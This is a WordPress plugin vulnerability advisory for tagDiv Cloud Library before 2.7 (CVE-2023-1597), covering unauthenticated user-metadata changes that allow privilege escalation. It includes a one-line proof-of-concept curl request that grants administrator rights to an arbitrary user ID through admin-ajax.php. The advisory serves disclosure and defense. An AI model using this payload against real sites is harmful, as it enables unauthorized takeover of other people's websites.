WordPress Plugin Vulnerabilities

tagDiv Cloud Library < 2.7 - Unauthenticated Arbitrary User Metadata Update to Privilege Escalation

Description

The plugin does not have authorisation and CSRF in an AJAX action accessible to both unauthenticated and authenticated users, allowing unauthenticated users to change arbitrary user metadata, which could lead to privilege escalation by setting themselves as an admin of the blog.

Proof of Concept

To set the user with ID 5 to an administrator:

curl -X POST --data 'action=tdb_user_form_on_submit&userID=5&formElements={"content-fields":[{"name":"wp_capabilities","value":{"administrator":true}}]}' https://example.com/wp-admin/admin-ajax.php

Affects Plugins

Plugin icon
td-cloud-library
Fixed in 2.7

References

CVE
CVE-2023-1597

Classification

Type
PRIVESC
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269
CVSS
9.9 (critical)

Miscellaneous

Original Researcher
Truoc Phan
Submitter
Truoc Phan
Submitter website
https://www.facebook.com/292706121240740
Submitter twitter
truocphan
Verified
Yes
WPVDB ID
4eafe111-8874-4560-83ff-394abe7a803b

Timeline

Publicly Published
2023-06-19 (about 5 months ago)
Added
2023-06-19 (about 5 months ago)
Last Updated
2023-06-19 (about 5 months ago)

Other

Published
Title
Published
2019-08-03
Title
Travel Management < 1.7 - Unauthenticated Options Change
Published
2016-06-06
Title
Newspaper Theme 6.4–6.7.1 - Privilege Escalation
Published
2023-06-19
Title
Greeklish-permalink < 3.5 - Unauthenticated Post Slug Update
Published
2020-03-11
Title
Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation
Published
2023-11-14
Title
Thrive Theme Builder < 3.24.0 - Privilege Escalation